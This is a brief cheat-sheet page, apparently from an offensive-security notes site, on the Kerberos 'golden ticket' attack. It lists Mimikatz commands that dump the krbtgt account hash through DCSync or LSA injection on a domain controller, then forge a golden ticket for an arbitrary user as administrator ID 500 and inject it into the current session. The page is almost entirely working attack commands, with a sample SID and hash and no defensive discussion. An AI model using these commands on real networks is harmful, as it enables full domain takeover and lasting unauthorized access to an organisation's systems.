Golden Tickets
Brief
Attack
lsadump::dcsync /user:krbtgt
# Alternatively Mimikatz can retrieve the hash of the krbtgt account from the Local Security Authority (LSA) by executing Mimikatz on the domain controller.
privilege::debug
lsadump::lsa /inject /name:krbtgt
# Now once you get the previously needed information and still in mimikatz :
kerberos::golden /User:random_user /domain:domain.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /id:500 /ptt
# cmd popup!Last updated